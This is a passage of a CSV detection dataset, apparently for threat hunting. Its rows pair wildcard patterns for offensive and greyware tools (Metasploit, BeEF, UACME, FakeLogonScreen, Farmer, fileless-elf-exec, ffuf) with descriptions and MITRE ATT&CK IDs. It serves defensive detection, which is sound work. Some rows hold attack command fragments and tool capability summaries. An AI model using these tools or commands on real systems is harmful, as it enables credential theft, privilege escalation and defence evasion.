abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - 
TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*Fadi002/unshackle*","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","N/A","10","10","1485","84","2023-09-23T15:54:14Z","2023-07-19T22:30:28Z" +"*Fake Computer Objects Honey Pots*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*Fake Service Accounts Honey Tokens*","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","270","60","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" +"*fake_ap.py*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z" +"*fake_common_roots.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_default_wordlist.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fake_evernote_clipper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_flash_update*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_lastpass/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*fake_notification_ff/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*FakeAMSI.c*","offensive_tool_keyword","FakeAMSI","Technically. 
AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.dll*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeAMSI.exe*","offensive_tool_keyword","FakeAMSI","Technically. AMSI is a set of DLLs being asked for a buffer evaluation (saying it's safe/unsafe). It means. processes (such as powershell.exe) load such DLLs when want to use AMSI. And it sounds like perfect opportunity to misuse such DLL as a method of persistence","T1117 - T1027","TA0003 ","N/A","N/A","Persistence","https://github.com/gtworek/PSBits/tree/master/FakeAMSI","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeCmdLine.*","offensive_tool_keyword","FakeCmdLine","Simple demonstration (C source code and compiled .exe) of a less-known (but documented) behavior of CreateProcess() function. 
Effectively you can put any string into the child process Command Line field.","T1059 - T1036","TA0003","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/tree/master/FakeCmdLine","1","1","N/A","N/A","10","2670","471","2023-09-28T06:10:58Z","2019-06-29T13:22:36Z" +"*FakeDriver.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*FakeDriver2.java*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*fakefuse.c*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*fakefuse.h*","offensive_tool_keyword","POC","This repo contains demo exploits for CVE-2022-0185","T1210 - T1222 - T1506 - T1068","TA0002 - TA0007 - TA0040","N/A","N/A","Exploitation tools","https://github.com/Crusaders-of-Rust/CVE-2022-0185","1","0","N/A","N/A","4","364","55","2022-04-25T04:11:33Z","2022-01-19T06:19:38Z" +"*FakeImageExploiter*","offensive_tool_keyword","FakeImageExploiter","This module takes one existing image.jpg and one payload.ps1 (input by user) and builds a new payload (agent.jpg.exe) that if executed it will trigger the download of the 2 previous files stored into apache2 (image.jpg + payload.ps1) and execute them.","T1564 - T1218 - T1204 - T1558.001","TA0002 - TA0008 - TA0010","N/A","N/A","Phishing","https://github.com/r00t-3xp10it/FakeImageExploiter","1","1","N/A","N/A","9","843","356","2019-12-06T20:59:26Z","2017-04-04T20:53:47Z" +"*fakelogonscreen *","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","0","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*fakelogonscreen*.zip*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*FakeLogonScreen.csproj*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z" +"*fakelogonscreen.exe*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. 
The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z"
+"*FakeLogonScreen.sln*","offensive_tool_keyword","fakelogonscreen","FakeLogonScreen is a utility to fake the Windows logon screen in order to obtain the user password. The password entered is validated against the Active Directory or local machine to make sure it is correct and is then displayed to the console or saved to disk","T1110 - T1141 - T1078 - T1552","TA0001 - TA0002 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/bitsadmin/fakelogonscreen","1","1","N/A","N/A","10","1225","230","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z"
+"*fakepath31337*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","1","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z"
+"*FakePPID.*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z"
+"*fake-sms-main*","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone 
number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","1","N/A","8","10","2514","167","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
+"*faketime '202* zsh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*farmer.exe *\windows\temp*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*farmer.exe 8888 60*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*Farmer\Farmer.csproj*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. 
Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*Farmer-main.zip*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","1","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*fastfuz-chrome-ext*files.txt*","offensive_tool_keyword","fastfuzz","Fast fuzzing websites with chrome extension","T1110","TA0006","N/A","N/A","Web Attacks","https://github.com/tismayil/fastfuz-chrome-ext","1","1","N/A","N/A","1","23","3","2022-02-04T02:15:51Z","2022-02-04T00:22:51Z"
+"*FastjsonScan.jar*","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","2757","606","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z"
+"*fasttrack/wordlist.txt*","offensive_tool_keyword","wordlists","package contains the rockyou.txt wordlist","T1110.001","TA0006","N/A","N/A","Credential Access","https://www.kali.org/tools/wordlists/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*fatal: buffer_get_string: bad string*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused 
by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z"
+"*favfreak-http*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z"
+"*fb5dc2d637faab73729d65323fcc7d4b7edf43bf9f3de8d8e65ea55670229815*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*fb8b5d212f449a8ba61ab9ed9b44853315c33d12a07f8ce4642892750e251530*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","0","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z"
+"*fcfhplploccackoneaefokcmbjfbkenj*","greyware_tool_keyword","1clickVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*fcrackzip *","offensive_tool_keyword","fcrackzip","a Free/Fast Zip Password Cracker","T1473 - T1021.002","TA0005 - TA0008","N/A","N/A","Credential Access","https://manpages.ubuntu.com/manpages/trusty/man1/fcrackzip.1.html","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*fcrackzip *","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*fcrackzip -u -v -D -p *.zip*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*fdcgdnkidjaadafnichfpabhfomcebme*","greyware_tool_keyword","ZenMate VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - 
TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*fde1b109f9704ff7.css*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*FE4414D9-1D7E-4EEB-B781-D278FE7A5619*","offensive_tool_keyword","RuralBishop","creates a local RW section in UrbanBishop and then maps that section as RX into a remote process","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004","TA0005 - TA0003 - TA0002","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/RuralBishop","1","0","N/A","10","2","101","28","2020-07-19T18:47:44Z","2020-07-19T18:47:38Z"
+"*FE8F0D23-BDD1-416D-8285-F947BA86D155*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","0","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z"
+"*fea01b74-7a60-4142-a54d-7aa8f6471c00*","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tools","https://github.com/gremwell/o365enum","1","0","N/A","7","3","212","40","2021-04-23T14:40:52Z","2020-02-18T12:22:50Z"
+"*fee */* -l pl | perl*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - 
T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*fee */* -l pl | ruby*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*fee -a *killall sshd* *busybox*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*fee -c */* | ssh *@*","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*fee -c */* -w 64 | *","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","N/A","8","4","334","40","2021-11-16T15:46:23Z","2020-01-06T12:19:34Z"
+"*feroxbuster -w *fzf-wordlists* -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Fertiliser.exe 
\\*","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","308","49","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z"
+"*ff_osx_extension-dropper*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*ff3f6b103b45ea48c5fa447854a35950378ce7558868d4975fd5b11202d0a991*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z"
+"*ff6e67d725ee64b4607dc6490a706dc9234c708cff814477de52d3beb781c6a1*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z"
+"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z"
+"*FFA0FDDE-BE70-49E4-97DE-753304EF1113*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z"
+"*ffbkglfijbcbgblgflchnbphjdllaogb*","greyware_tool_keyword","CyberGhost VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*ffhhkmlgedgcliajaedapkdfigdobcif*","greyware_tool_keyword","Nucleus VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*ffuf *-input-cmd*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf *-u http*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z" 
+"*ffuf -c *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf -fs 185 -c -w *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ffuf -w *","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","0","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf.exe*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
+"*ffuf/ffuf*","offensive_tool_keyword","ffuf","Fast web fuzzer written in Go","T1110 - T1550","TA0006 - TA0008","N/A","N/A","Reconnaissance","https://github.com/ffuf/ffuf","1","1","N/A","N/A","10","10180","1155","2023-09-20T16:02:23Z","2018-11-08T09:25:49Z"
